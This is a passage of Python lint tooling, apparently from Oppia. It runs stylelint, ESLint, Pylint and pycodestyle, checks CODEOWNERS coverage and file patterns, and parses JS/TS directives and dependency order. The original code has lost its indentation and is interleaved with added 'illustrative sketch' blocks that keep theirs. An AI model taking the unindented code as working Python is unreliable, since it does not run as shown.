stylelint_cmd_args = [
node_path, stylelint_path, '--config=' + config_path]
result_list = []
if not verbose_mode_enabled:
python_utils.PRINT('Linting CSS files.')
for _, filepath in enumerate(files_to_lint):
if verbose_mode_enabled:
python_utils.PRINT('Linting: ', filepath)
proc_args = stylelint_cmd_args + [filepath]
proc = subprocess.Popen(
proc_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
encoded_linter_stdout, encoded_linter_stderr = proc.communicate()
linter_stdout = encoded_linter_stdout.decode(encoding='utf-8')
linter_stderr = encoded_linter_stderr.decode(encoding='utf-8')
if linter_stderr:
python_utils.PRINT('LINTER FAILED')
python_utils.PRINT(linter_stderr)
sys.exit(1)
if linter_stdout:
num_files_with_errors += 1
result_list.append(linter_stdout)
python_utils.PRINT(linter_stdout)
stdout.put(linter_stdout)
if num_files_with_errors:
for error in result_list:
result.put(error)
result.put('%s %s CSS file' % (
_MESSAGE_TYPE_FAILED, num_files_with_errors))
else:
result.put('%s %s CSS file linted (%.1f secs)' % (
_MESSAGE_TYPE_SUCCESS, num_css_files, time.time() - start_time))
python_utils.PRINT('CSS linting finished.')
def _lint_js_and_ts_files(
node_path, eslint_path, files_to_lint, result, verbose_mode_enabled):
"""Prints a list of lint errors in the given list of JavaScript files.
Args:
node_path: str. Path to the node binary.
eslint_path: str. Path to the ESLint binary.
files_to_lint: list(str). A list of filepaths to lint.
result: multiprocessing.Queue. A queue to put results of test.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
start_time = time.time()
num_files_with_errors = 0
num_js_and_ts_files = len(files_to_lint)
if not files_to_lint:
result.put('')
python_utils.PRINT(
'There are no JavaScript or Typescript files to lint.')
return
python_utils.PRINT('Total js and ts files: ', num_js_and_ts_files)
eslint_cmd_args = [node_path, eslint_path, '--quiet']
result_list = []
python_utils.PRINT('Linting JS and TS files.')
for _, filepath in enumerate(files_to_lint):
if verbose_mode_enabled:
python_utils.PRINT('Linting: ', filepath)
proc_args = eslint_cmd_args + [filepath]
proc = subprocess.Popen(
proc_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
encoded_linter_stdout, encoded_linter_stderr = proc.communicate()
linter_stdout = encoded_linter_stdout.decode(encoding='utf-8')
linter_stderr = encoded_linter_stderr.decode(encoding='utf-8')
if linter_stderr:
python_utils.PRINT('LINTER FAILED')
python_utils.PRINT(linter_stderr)
sys.exit(1)
if linter_stdout:
num_files_with_errors += 1
result_list.append(linter_stdout)
if num_files_with_errors:
for error in result_list:
result.put(error)
result.put('%s %s JavaScript and Typescript files' % (
_MESSAGE_TYPE_FAILED, num_files_with_errors))
else:
result.put(
'%s %s JavaScript and Typescript files linted (%.1f secs)' % (
_MESSAGE_TYPE_SUCCESS, num_js_and_ts_files,
time.time() - start_time))
python_utils.PRINT('Js and Ts linting finished.')
def _lint_py_files(
config_pylint, config_pycodestyle, files_to_lint, result,
verbose_mode_enabled):
"""Prints a list of lint errors in the given list of Python files.
Args:
config_pylint: str. Path to the .pylintrc file.
config_pycodestyle: str. Path to the tox.ini file.
files_to_lint: list(str). A list of filepaths to lint.
result: multiprocessing.Queue. A queue to put results of test.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
start_time = time.time()
are_there_errors = False
num_py_files = len(files_to_lint)
if not files_to_lint:
result.put('')
python_utils.PRINT('There are no Python files to lint.')
return
python_utils.PRINT('Linting %s Python files' % num_py_files)
_batch_size = 50
current_batch_start_index = 0
while current_batch_start_index < len(files_to_lint):
# Note that this index is an exclusive upper bound -- i.e., the current
# batch of files ranges from 'start_index' to 'end_index - 1'.
current_batch_end_index = min(
current_batch_start_index + _batch_size, len(files_to_lint))
current_files_to_lint = files_to_lint[
current_batch_start_index: current_batch_end_index]
if verbose_mode_enabled:
python_utils.PRINT('Linting Python files %s to %s...' % (
current_batch_start_index + 1, current_batch_end_index))
with _redirect_stdout(_TARGET_STDOUT):
# This line invokes Pylint and prints its output
# to the target stdout.
pylinter = lint.Run(
current_files_to_lint + [config_pylint],
exit=False).linter
# These lines invoke Pycodestyle and print its output
# to the target stdout.
style_guide = pycodestyle.StyleGuide(config_file=config_pycodestyle)
pycodestyle_report = style_guide.check_files(
paths=current_files_to_lint)
if pylinter.msg_status != 0 or pycodestyle_report.get_count() != 0:
result.put(_TARGET_STDOUT.getvalue())
are_there_errors = True
current_batch_start_index = current_batch_end_index
if are_there_errors:
result.put('%s Python linting failed' % _MESSAGE_TYPE_FAILED)
else:
result.put('%s %s Python files linted (%.1f secs)' % (
_MESSAGE_TYPE_SUCCESS, num_py_files, time.time() - start_time))
python_utils.PRINT('Python linting finished.')
def _lint_py_files_for_python3_compatibility(
files_to_lint, result, verbose_mode_enabled):
"""Prints a list of Python 3 compatibility errors in the given list of
Python files.
Args:
files_to_lint: list(str). A list of filepaths to lint.
result: multiprocessing.Queue. A queue to put results of test.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
start_time = time.time()
any_errors = False
files_to_lint_for_python3_compatibility = [
file_name for file_name in files_to_lint if not re.match(
r'^.*python_utils.*\.py$', file_name)]
num_py_files = len(files_to_lint_for_python3_compatibility)
if not files_to_lint_for_python3_compatibility:
result.put('')
python_utils.PRINT(
'There are no Python files to lint for Python 3 compatibility.')
return
python_utils.PRINT(
'Linting %s Python files for Python 3 compatibility.' % num_py_files)
_batch_size = 50
current_batch_start_index = 0
while current_batch_start_index < len(
files_to_lint_for_python3_compatibility):
# Note that this index is an exclusive upper bound -- i.e., the current
# batch of files ranges from 'start_index' to 'end_index - 1'.
current_batch_end_index = min(
current_batch_start_index + _batch_size, len(
files_to_lint_for_python3_compatibility))
current_files_to_lint = files_to_lint_for_python3_compatibility[
current_batch_start_index: current_batch_end_index]
if verbose_mode_enabled:
python_utils.PRINT(
'Linting Python files for Python 3 compatibility %s to %s...'
% (current_batch_start_index + 1, current_batch_end_index))
with _redirect_stdout(_TARGET_STDOUT):
# This line invokes Pylint and prints its output
# to the target stdout.
python_utils.PRINT('Messages for Python 3 support:')
pylinter_for_python3 = lint.Run(
current_files_to_lint + ['--py3k'], exit=False).linter
if pylinter_for_python3.msg_status != 0:
result.put(_TARGET_STDOUT.getvalue())
any_errors = True
current_batch_start_index = current_batch_end_index
if any_errors:
result.put(
'%s Python linting for Python 3 compatibility failed'
% _MESSAGE_TYPE_FAILED)
else:
result.put(
'%s %s Python files linted for Python 3 compatibility (%.1f secs)'
% (_MESSAGE_TYPE_SUCCESS, num_py_files, time.time() - start_time))
python_utils.PRINT('Python linting for Python 3 compatibility finished.')
def _check_codeowner_file(verbose_mode_enabled):
"""Checks the CODEOWNERS file for any uncovered dirs/files and also
checks that every pattern in the CODEOWNERS file matches at least one
file/dir. Note that this checks the CODEOWNERS file according to the
glob patterns supported by the Python 2.7 environment. For more information,
please refer to https://docs.python.org/2/library/glob.html.
This function also ensures that the most important rules are at the
bottom of the CODEOWNERS file.
"""
if verbose_mode_enabled:
python_utils.PRINT('Starting CODEOWNERS file check')
python_utils.PRINT('----------------------------------------')
with _redirect_stdout(_TARGET_STDOUT):
failed = False
summary_messages = []
# Checks whether every pattern in the CODEOWNERS file matches at
# least one dir/file.
critical_file_section_found = False
important_rules_in_critical_section = []
file_patterns = []
dir_patterns = []
for line_num, line in enumerate(FILE_CACHE.readlines(
CODEOWNER_FILEPATH)):
stripped_line = line.strip()
if '# Critical files' in line:
critical_file_section_found = True
if stripped_line and stripped_line[0] != '#':
if '@' not in line:
python_utils.PRINT(
'%s --> Pattern on line %s doesn\'t have '
'codeowner' % (CODEOWNER_FILEPATH, line_num + 1))
failed = True
else:
# Extract the file pattern from the line.
line_in_concern = line.split('@')[0].strip()
# This is being populated for the important rules
# check.
if critical_file_section_found:
important_rules_in_critical_section.append(
line_in_concern)
# Checks if the path is the full path relative to the
# root oppia directory.
if not line_in_concern.startswith('/'):
python_utils.PRINT(
'%s --> Pattern on line %s is invalid. Use '
'full path relative to the root directory'
% (CODEOWNER_FILEPATH, line_num + 1))
failed = True
# The double asterisks pattern is supported by the
# CODEOWNERS syntax but not the glob in Python 2.
# The following condition checks this.
if '**' in line_in_concern:
python_utils.PRINT(
'%s --> Pattern on line %s is invalid. '
'\'**\' wildcard not allowed' % (
CODEOWNER_FILEPATH, line_num + 1))
failed = True
# Adjustments to the dir paths in CODEOWNERS syntax
# for glob-style patterns to match correctly.
if line_in_concern.endswith('/'):
line_in_concern = line_in_concern[:-1]
# The following condition checks whether the specified
# path exists in the codebase or not. The CODEOWNERS
# syntax has paths starting with '/' which refers to
# full path relative to root, but python glob module
# does not conform to this logic and literally matches
# the '/' character. Therefore the leading '/' has to
# be changed to './' for glob patterns to match
# correctly.
line_in_concern = line_in_concern.replace('/', './', 1)
if not glob.glob(line_in_concern):
python_utils.PRINT(
'%s --> Pattern on line %s doesn\'t match '
'any file or directory' % (
CODEOWNER_FILEPATH, line_num + 1))
failed = True
# The following list is being populated with the
# paths in the CODEOWNERS file with the removal of the
# leading '/' to aid in the glob pattern matching in
# the next part of the check wherein the valid patterns
# are used to check if they cover the entire codebase.
if os.path.isdir(line_in_concern):
dir_patterns.append(line_in_concern)
else:
file_patterns.append(line_in_concern)
# Checks that every file (except those under the dir represented by
# the dir_patterns) is covered under CODEOWNERS.
for file_paths in _walk_with_gitignore('.', dir_patterns):
for file_path in file_paths:
match = False
for file_pattern in file_patterns:
if file_path in glob.glob(file_pattern):
match = True
break
if not match:
python_utils.PRINT(
'%s is not listed in the .github/CODEOWNERS file.' % (
file_path))
failed = True
failed = failed or (
check_for_important_patterns_at_bottom_of_codeowners(
important_rules_in_critical_section))
if failed:
summary_message = (
'%s CODEOWNERS file coverage check failed, see messages '
'above for files that need to be added or patterns that need '
'to be fixed.' % _MESSAGE_TYPE_FAILED)
else:
summary_message = '%s CODEOWNERS file check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT(summary_message)
python_utils.PRINT('')
return summary_messages
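# --- Illustrative sketch (not part of the original linter) ---
# The CODEOWNERS check above turns each pattern into something Python's
# glob module can match: a trailing '/' is stripped and the leading '/'
# (which CODEOWNERS treats as "relative to the repo root") is rewritten
# as './'. A minimal standalone version of that conversion, using a
# hypothetical pattern, could look like this:
import glob

def codeowners_pattern_to_glob(pattern):
    """Convert a CODEOWNERS path pattern into a glob pattern."""
    if pattern.endswith('/'):
        pattern = pattern[:-1]
    # glob matches a leading '/' literally, so make the path explicitly
    # relative to the current directory instead.
    return pattern.replace('/', './', 1)

sample_pattern = '/core/templates/'  # hypothetical CODEOWNERS entry
glob_pattern = codeowners_pattern_to_glob(sample_pattern)
print(glob_pattern)                   # ./core/templates
print(bool(glob.glob(glob_pattern)))  # True only if that path exists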
class LintChecksManager( # pylint: disable=inherit-non-class
python_utils.with_metaclass(abc.ABCMeta, python_utils.OBJECT)):
"""Manages all the common linting functions. As an abstract base class, this
is not intended to be used directly.
Attributes:
all_filepaths: list(str). The list of filepaths to be linted.
parsed_js_files: dict. Contains the content of JS files, after
validating and parsing the files.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
def __init__(self, verbose_mode_enabled=False): # pylint: disable=super-init-not-called
"""Constructs a LintChecksManager object.
Args:
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
# Set path for node.
# The path for node is set explicitly, since otherwise the lint
# tests fail on CircleCI due to the TypeScript files not being
# compilable.
node_path = os.path.join(os.pardir, 'oppia_tools/node-10.15.3')
os.environ['PATH'] = '%s/bin:' % node_path + os.environ['PATH']
self.verbose_mode_enabled = verbose_mode_enabled
self.process_manager = multiprocessing.Manager().dict()
@abc.abstractproperty
def all_filepaths(self):
"""Returns all file paths."""
pass
def _run_multiple_checks(self, *checks):
"""Run multiple checks in parallel."""
processes = []
for check in checks:
p = multiprocessing.Process(target=check)
processes.append(p)
p.start()
for p in processes:
p.join()
def _check_for_mandatory_pattern_in_file(
self, pattern_list, filepath, failed):
"""Checks for a given mandatory pattern in a file.
Args:
pattern_list: list(dict). The list of mandatory patterns to be
checked for in the file.
filepath: str. The path to the file to be linted.
failed: bool. Status of failure of the check.
Returns:
bool. The failure status of the check.
"""
# This boolean list keeps track of the regex matches
# found in the file.
pattern_found_list = []
file_content = FILE_CACHE.readlines(filepath)
for index, regexp_to_check in enumerate(
pattern_list):
if (any([filepath.endswith(
allowed_type) for allowed_type in (
regexp_to_check['included_types'])]) and (
not any([
filepath.endswith(
pattern) for pattern in (
regexp_to_check[
'excluded_files'] +
regexp_to_check[
'excluded_dirs'])]))):
pattern_found_list.append(index)
for line in file_content:
if regexp_to_check['regexp'].search(line):
pattern_found_list.pop()
break
if pattern_found_list:
failed = True
for pattern_found in pattern_found_list:
python_utils.PRINT('%s --> %s' % (
filepath,
pattern_list[pattern_found]['message']))
return failed
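# --- Illustrative sketch (not part of the original linter) ---
# Each entry consumed by _check_for_mandatory_pattern_in_file is a dict
# carrying a compiled 'regexp', a human-readable 'message', and the
# 'included_types' / 'excluded_files' / 'excluded_dirs' filters. The
# entry below is hypothetical (the real lists live in
# MANDATORY_PATTERNS_REGEXP and MANDATORY_PATTERNS_JS_REGEXP); it only
# shows the expected shape and how a single file would be tested.
import re

EXAMPLE_MANDATORY_PATTERN = {
    'regexp': re.compile(r'Copyright \d{4}'),
    'message': 'Please add a copyright notice to the file.',
    'included_types': ('.py', '.ts'),
    'excluded_files': (),
    'excluded_dirs': (),
}

def file_is_missing_pattern(filepath, lines, entry=EXAMPLE_MANDATORY_PATTERN):
    """Return True if a file of an included type lacks the pattern."""
    if not filepath.endswith(entry['included_types']):
        return False
    if filepath.endswith(entry['excluded_files'] + entry['excluded_dirs']):
        return False
    return not any(entry['regexp'].search(line) for line in lines)

print(file_is_missing_pattern('core/foo.py', ['# Copyright 2019']))  # False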
def _check_mandatory_patterns(self):
"""This function checks that all files contain the mandatory
patterns.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting mandatory patterns check')
python_utils.PRINT('----------------------------------------')
summary_messages = []
failed = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
sets_of_patterns_to_match = [
MANDATORY_PATTERNS_REGEXP, MANDATORY_PATTERNS_JS_REGEXP]
for filepath in self.all_filepaths:
for pattern_list in sets_of_patterns_to_match:
failed = self._check_for_mandatory_pattern_in_file(
pattern_list, filepath, failed)
if failed:
summary_message = (
'%s Mandatory pattern check failed, see errors above for '
'patterns that should be added.' % _MESSAGE_TYPE_FAILED)
else:
summary_message = (
'%s Mandatory pattern check passed' % (
_MESSAGE_TYPE_SUCCESS))
python_utils.PRINT(summary_message)
python_utils.PRINT('')
summary_messages.append(summary_message)
self.process_manager['mandatory'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_bad_patterns(self):
"""This function is used for detecting bad patterns."""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting Pattern Checks')
python_utils.PRINT('----------------------------------------')
total_files_checked = 0
total_error_count = 0
summary_messages = []
all_filepaths = [
filepath for filepath in self.all_filepaths if not (
filepath.endswith('pre_commit_linter.py') or
any(
fnmatch.fnmatch(filepath, pattern)
for pattern in EXCLUDED_PATHS)
)]
failed = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
for filepath in all_filepaths:
file_content = FILE_CACHE.read(filepath)
total_files_checked += 1
for pattern in BAD_PATTERNS:
if (pattern in file_content and
not _is_filepath_excluded_for_bad_patterns_check(
pattern, filepath)):
failed = True
python_utils.PRINT('%s --> %s' % (
filepath, BAD_PATTERNS[pattern]['message']))
python_utils.PRINT('')
total_error_count += 1
for regexp in BAD_PATTERNS_REGEXP:
if _check_bad_pattern_in_file(
filepath, file_content, regexp):
failed = True
total_error_count += 1
temp_failed, temp_count = _check_file_type_specific_bad_pattern(
filepath, file_content)
failed = failed or temp_failed
total_error_count += temp_count
if filepath == 'constants.ts':
for pattern in REQUIRED_STRINGS_CONSTANTS:
if pattern not in file_content:
failed = True
python_utils.PRINT('%s --> %s' % (
filepath,
REQUIRED_STRINGS_CONSTANTS[pattern]['message']))
python_utils.PRINT('')
total_error_count += 1
if failed:
summary_message = (
'%s Pattern check failed, see errors above '
'for patterns that should be removed.' % (
_MESSAGE_TYPE_FAILED))
summary_messages.append(summary_message)
else:
summary_message = '%s Pattern checks passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT('')
if total_files_checked == 0:
python_utils.PRINT('There are no files to be checked.')
else:
python_utils.PRINT('(%s files checked, %s errors found)' % (
total_files_checked, total_error_count))
python_utils.PRINT(summary_message)
self.process_manager['bad_pattern'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_patterns(self):
"""Run checks relate to bad patterns."""
methods = [self._check_bad_patterns, self._check_mandatory_patterns]
self._run_multiple_checks(*methods)
def perform_all_lint_checks(self):
"""Perform all the lint checks and returns the messages returned by all
the checks.
Returns:
all_messages: str. All the messages returned by the lint checks.
"""
self._check_patterns()
mandatory_patterns_messages = self.process_manager['mandatory']
pattern_messages = self.process_manager['bad_pattern']
return (
mandatory_patterns_messages + pattern_messages)
class JsTsLintChecksManager(LintChecksManager):
"""Manages all the Js and Ts linting functions.
Attributes:
all_filepaths: list(str). The list of filepaths to be linted.
js_filepaths: list(str). The list of js filepaths to be linted.
ts_filepaths: list(str). The list of ts filepaths to be linted.
parsed_js_and_ts_files: dict. Contains the content of JS files, after
validating and parsing the files.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
def __init__(self, verbose_mode_enabled=False):
"""Constructs a JsTsLintChecksManager object.
Args:
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
node_path = os.path.join(os.pardir, 'oppia_tools/node-10.15.3')
os.environ['PATH'] = '%s/bin:' % node_path + os.environ['PATH']
super(JsTsLintChecksManager, self).__init__(
verbose_mode_enabled=verbose_mode_enabled)
self.parsed_js_and_ts_files = []
self.parsed_expressions_in_files = []
@property
def js_filepaths(self):
"""Return all js filepaths."""
return _FILES['.js']
@property
def ts_filepaths(self):
"""Return all ts filepaths."""
return _FILES['.ts']
@property
def all_filepaths(self):
"""Return all filepaths."""
return self.js_filepaths + self.ts_filepaths
def _validate_and_parse_js_and_ts_files(self):
"""This function validates JavaScript and Typescript files and
returns the parsed contents as a Python dictionary.
Returns:
dict. contains the contents of js and ts files after
validating and parsing the files.
"""
# Select JS files which need to be checked.
files_to_check = [
filepath for filepath in self.all_filepaths if
not any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
parsed_js_and_ts_files = dict()
if not files_to_check:
return parsed_js_and_ts_files
compiled_js_dir = tempfile.mkdtemp(
dir=os.getcwd(), prefix='tmpcompiledjs')
if not self.verbose_mode_enabled:
python_utils.PRINT('Validating and parsing JS and TS files ...')
for filepath in files_to_check:
if self.verbose_mode_enabled:
python_utils.PRINT(
'Validating and parsing %s file ...' % filepath)
file_content = FILE_CACHE.read(filepath)
try:
# Use esprima to parse a JS or TS file.
parsed_js_and_ts_files[filepath] = esprima.parseScript(
file_content, comment=True)
except Exception as e:
# Compile typescript file which has syntax not valid for JS
# file.
if filepath.endswith('.js'):
shutil.rmtree(compiled_js_dir)
raise Exception(e)
try:
compiled_js_filepath = self._compile_ts_file(
filepath, compiled_js_dir)
file_content = FILE_CACHE.read(compiled_js_filepath)
parsed_js_and_ts_files[filepath] = esprima.parseScript(
file_content)
except Exception as e:
shutil.rmtree(compiled_js_dir)
raise Exception(e)
shutil.rmtree(compiled_js_dir)
return parsed_js_and_ts_files
def _get_expressions_from_parsed_script(self):
"""This function returns the expressions in the script parsed using
js and ts files.
Returns:
dict. contains the expressions in the script parsed using js
and ts files.
"""
parsed_expressions_in_files = collections.defaultdict(dict)
components_to_check = ['controller', 'directive', 'factory', 'filter']
for filepath, parsed_script in self.parsed_js_and_ts_files.items():
parsed_expressions_in_files[filepath] = collections.defaultdict(
list)
parsed_nodes = parsed_script.body
for parsed_node in parsed_nodes:
for component in components_to_check:
expression = _get_expression_from_node_if_one_exists(
parsed_node, [component])
parsed_expressions_in_files[filepath][component].append(
expression)
return parsed_expressions_in_files
def _compile_ts_file(self, filepath, dir_path):
"""Compiles a typescript file and returns the path for compiled
js file.
"""
allow_js = 'true'
lib = 'es2017,dom'
no_implicit_use_strict = 'true'
skip_lib_check = 'true'
target = 'es5'
type_roots = './node_modules/@types'
cmd = (
'./node_modules/typescript/bin/tsc -outDir %s -allowJS %s '
'-lib %s -noImplicitUseStrict %s -skipLibCheck '
'%s -target %s -typeRoots %s %s typings/*') % (
dir_path, allow_js, lib, no_implicit_use_strict,
skip_lib_check, target, type_roots, filepath)
subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
compiled_js_filepath = os.path.join(
dir_path, os.path.basename(filepath).replace('.ts', '.js'))
return compiled_js_filepath
def _check_extra_js_files(self):
"""Checks if the changes made include extra js files in core
or extensions folder which are not specified in
build.JS_FILEPATHS_NOT_TO_BUILD.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting extra js files check')
python_utils.PRINT('----------------------------------------')
summary_messages = []
failed = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
js_files_to_check = self.js_filepaths
for filepath in js_files_to_check:
if filepath.startswith(('core/templates', 'extensions')) and (
filepath not in build.JS_FILEPATHS_NOT_TO_BUILD) and (
not filepath.endswith('protractor.js')):
python_utils.PRINT(
'%s --> Found extra .js file\n' % filepath)
failed = True
if failed:
err_msg = (
'If you want the above files to be present as js files, '
'add them to the list JS_FILEPATHS_NOT_TO_BUILD in '
'build.py. Otherwise, rename them to .ts\n')
python_utils.PRINT(err_msg)
if failed:
summary_message = (
'%s Extra JS files check failed, see '
'message above on resolution steps.' % (
_MESSAGE_TYPE_FAILED))
else:
summary_message = '%s Extra JS files check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT(summary_message)
python_utils.PRINT('')
self.process_manager['extra'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_js_and_ts_component_name_and_count(self):
"""This function ensures that all JS/TS files have exactly
one component and that the name of the component
matches the filename.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting js component name and count check')
python_utils.PRINT('----------------------------------------')
# Select JS files which need to be checked.
files_to_check = [
filepath for filepath in self.all_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)
and (not filepath.endswith('App.ts'))]
failed = False
summary_messages = []
components_to_check = ['controller', 'directive', 'factory', 'filter']
stdout = python_utils.string_io()
for filepath in files_to_check:
component_num = 0
parsed_expressions = self.parsed_expressions_in_files[filepath]
with _redirect_stdout(stdout):
for component in components_to_check:
if component_num > 1:
break
for expression in parsed_expressions[component]:
if not expression:
continue
component_num += 1
# Check if the number of components in each file exceeds
# one.
if component_num > 1:
python_utils.PRINT(
'%s -> Please ensure that there is exactly one '
'component in the file.' % (filepath))
failed = True
break
with _redirect_stdout(stdout):
if failed:
summary_message = (
'%s JS and TS Component name and count check failed, '
'see messages above for duplicate names.' % (
_MESSAGE_TYPE_FAILED))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = (
'%s JS and TS Component name and count check passed' %
(_MESSAGE_TYPE_SUCCESS))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
python_utils.PRINT('')
self.process_manager['component'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_directive_scope(self):
"""This function checks that all directives have an explicit
scope: {} and it should not be scope: true.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting directive scope check')
python_utils.PRINT('----------------------------------------')
# Select JS and TS files which need to be checked.
files_to_check = [
filepath for filepath in self.all_filepaths if
not any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
failed = False
summary_messages = []
components_to_check = ['directive']
stdout = python_utils.string_io()
for filepath in files_to_check:
parsed_expressions = self.parsed_expressions_in_files[filepath]
with _redirect_stdout(stdout):
# Parse the body of the content as nodes.
for component in components_to_check:
for expression in parsed_expressions[component]:
if not expression:
continue
# Separate the arguments of the expression.
arguments = expression.arguments
# The first argument of the expression is the
# name of the directive.
if arguments[0].type == 'Literal':
directive_name = str(arguments[0].value)
arguments = arguments[1:]
for argument in arguments:
# Check the type of an argument.
if argument.type != 'ArrayExpression':
continue
# Separate out the elements for the argument.
elements = argument.elements
for element in elements:
# Check the type of an element.
if element.type != 'FunctionExpression':
continue
# Separate out the body of the element.
body = element.body
if body.type != 'BlockStatement':
continue
# Further separate the body elements from the
# body.
body_elements = body.body
for body_element in body_elements:
# Check if the body element is a return
# statement.
body_element_type_is_not_return = (
body_element.type != 'ReturnStatement')
body_element_arg_type_is_not_object = (
body_element.argument.type != (
'ObjectExpression'))
if (
body_element_arg_type_is_not_object
or (
body_element_type_is_not_return
)):
continue
# Separate the properties of the return
# node.
return_node_properties = (
body_element.argument.properties)
# Loop over all the properties of the return
# node to find out the scope key.
for return_node_property in (
return_node_properties):
# Check whether the property is scope.
property_key_is_an_identifier = (
return_node_property.key.type == (
'Identifier'))
property_key_name_is_scope = (
return_node_property.key.name == (
'scope'))
if (
property_key_is_an_identifier
and (
property_key_name_is_scope
)):
# Separate the scope value and
# check if it is an Object
# Expression. If it is not, then
# check for scope: true and report
# the error message.
scope_value = (
return_node_property.value)
if (
scope_value.type == (
'Literal')
and (
scope_value.value)):
failed = True
python_utils.PRINT(
'Please ensure that %s '
'directive in %s file '
'does not have scope set '
'to true.' %
(directive_name, filepath))
python_utils.PRINT('')
elif scope_value.type != (
'ObjectExpression'):
# Check whether the directive
# has scope: {} else report
# the error message.
failed = True
python_utils.PRINT(
'Please ensure that %s '
'directive in %s file has '
'a scope: {}.' % (
directive_name, filepath
))
python_utils.PRINT('')
with _redirect_stdout(stdout):
if failed:
summary_message = (
'%s Directive scope check failed, '
'see messages above for suggested fixes.' % (
_MESSAGE_TYPE_FAILED))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = '%s Directive scope check passed' % (
_MESSAGE_TYPE_SUCCESS)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
python_utils.PRINT('')
self.process_manager['directive'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_sorted_dependencies(self):
"""This function checks that the dependencies which are
imported in the controllers/directives/factories in JS
files are in the following pattern: dollar imports, regular
imports, and constant imports, all in sorted order.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting sorted dependencies check')
python_utils.PRINT('----------------------------------------')
files_to_check = [
filepath for filepath in self.all_filepaths if
not any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
components_to_check = ['controller', 'directive', 'factory']
failed = False
summary_messages = []
stdout = python_utils.string_io()
for filepath in files_to_check:
parsed_expressions = self.parsed_expressions_in_files[filepath]
with _redirect_stdout(stdout):
for component in components_to_check:
for expression in parsed_expressions[component]:
if not expression:
continue
# Separate the arguments of the expression.
arguments = expression.arguments
if arguments[0].type == 'Literal':
property_value = str(arguments[0].value)
arguments = arguments[1:]
for argument in arguments:
if argument.type != 'ArrayExpression':
continue
literal_args = []
function_args = []
dollar_imports = []
regular_imports = []
constant_imports = []
elements = argument.elements
for element in elements:
if element.type == 'Literal':
literal_args.append(str(element.value))
elif element.type == 'FunctionExpression':
func_args = element.params
for func_arg in func_args:
function_args.append(str(func_arg.name))
for arg in function_args:
if arg.startswith('$'):
dollar_imports.append(arg)
elif re.search('[a-z]', arg):
regular_imports.append(arg)
else:
constant_imports.append(arg)
dollar_imports.sort()
regular_imports.sort()
constant_imports.sort()
sorted_imports = (
dollar_imports + regular_imports + (
constant_imports))
if sorted_imports != function_args:
failed = True
python_utils.PRINT(
'Please ensure that in %s in file %s, the '
'injected dependencies should be in the '
'following manner: dollar imports, regular '
'imports and constant imports, all in '
'sorted order.'
% (property_value, filepath))
if sorted_imports != literal_args:
failed = True
python_utils.PRINT(
'Please ensure that in %s in file %s, the '
'stringfied dependencies should be in the '
'following manner: dollar imports, regular '
'imports and constant imports, all in '
'sorted order.'
% (property_value, filepath))
with _redirect_stdout(stdout):
if failed:
summary_message = (
'%s Sorted dependencies check failed, fix files '
'that don\'t have sorted dependencies mentioned above.' % (
_MESSAGE_TYPE_FAILED))
else:
summary_message = (
'%s Sorted dependencies check passed' % (
_MESSAGE_TYPE_SUCCESS))
summary_messages.append(summary_message)
python_utils.PRINT('')
python_utils.PRINT(summary_message)
if self.verbose_mode_enabled:
python_utils.PRINT('----------------------------------------')
self.process_manager['sorted'] = summary_messages
_STDOUT_LIST.append(stdout)
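# --- Illustrative sketch (not part of the original linter) ---
# The sorted-dependencies check above buckets every injected name into
# dollar imports (names starting with '$'), regular imports (names
# containing a lowercase letter) and constant imports (everything else),
# then expects the concatenation of the three sorted buckets to equal
# the original order. A standalone version of that classification, run
# on a hypothetical dependency list:
import re

def expected_dependency_order(names):
    dollar_imports = sorted(n for n in names if n.startswith('$'))
    regular_imports = sorted(
        n for n in names if not n.startswith('$') and re.search('[a-z]', n))
    constant_imports = sorted(
        n for n in names
        if not n.startswith('$') and not re.search('[a-z]', n))
    return dollar_imports + regular_imports + constant_imports

example = ['$scope', 'UrlService', 'PAGE_MODES', '$http']
print(expected_dependency_order(example))
# ['$http', '$scope', 'UrlService', 'PAGE_MODES']
print(expected_dependency_order(example) == example)  # False -> would fail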
def _match_line_breaks_in_controller_dependencies(self):
"""This function checks whether the line breaks between the dependencies
listed in the controller of a directive or service exactly match those
between the arguments of the controller function.
"""
if self.verbose_mode_enabled:
python_utils.PRINT(
'Starting controller dependency line break check')
python_utils.PRINT('----------------------------------------')
files_to_check = [
filepath for filepath in self.all_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
failed = False
summary_messages = []
# For RegExp explanation, please see https://regex101.com/r/T85GWZ/2/.
